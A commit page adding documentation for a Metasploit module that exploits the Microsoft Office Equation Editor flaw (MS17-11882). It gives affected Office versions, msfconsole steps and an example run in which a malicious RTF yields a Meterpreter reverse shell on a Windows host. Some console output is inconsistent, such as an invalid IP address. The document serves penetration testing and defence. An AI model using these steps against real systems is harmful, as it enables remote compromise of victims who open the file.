Skip to content

Commit 69b01d2

Browse files
committed
Land rapid7#9226, Microsoft Office OLE object memory corruption
2 parents 19b37c7 + b96dac2 commit 69b01d2

File tree

2 files changed

+368
-0
lines changed

2 files changed

+368
-0
lines changed
Lines changed: 53 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,53 @@
1+
2+
Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.
3+
4+
## Vulnerable Application
5+
6+
- Microsoft Office 2016
7+
- Microsoft Office 2013 Service Pack 1
8+
- Microsoft Office 2010 Service Pack 2
9+
- Microsoft Office 2007
10+
11+
## Verification Steps
12+
13+
1. Start msfconsole
14+
2. Do: `use exploit/windows/fileformat/office_ms17_11882`
15+
3. Do: `set PAYLOAD [PAYLOAD]`
16+
4. Do: `run`
17+
18+
## Options
19+
### FILENAME
20+
Filename to output, and location to which should be written.
21+
22+
23+
## Example
24+
25+
```
26+
msf > use exploit/windows/fileformat/office_ms17_11882
27+
msf exploit(office_ms17_11882) > set FILENAME msf.rtf
28+
FILENAME => /home/mumbai/file.rtf
29+
msf exploit(office_ms17_11882) > set LHOST ens3
30+
LHOST => ens3
31+
msf exploit(office_ms17_11882) > set LPORT 35116
32+
LPORT => 35116
33+
msf exploit(office_ms17_11882) > run
34+
[*] Using URL: http://0.0.0.0:8080/BUY0DYgc
35+
[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc
36+
[*] Server started.
37+
[*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24
38+
[*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending
39+
[*] Sending stage (205379 bytes) to 192.168.0.24
40+
[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500
41+
sessions -i 1
42+
[*] Starting interaction with 1...
43+
44+
meterpreter > sysinfo
45+
Computer : TEST-PC
46+
OS : Windows 7 (Build 7601, Service Pack 1).
47+
Architecture : x64
48+
System Language : en_US
49+
Domain : WORKGROUP
50+
Logged On Users : 1
51+
Meterpreter : x64/windows
52+
meterpreter >
53+
```

0 commit comments

Comments
 (0)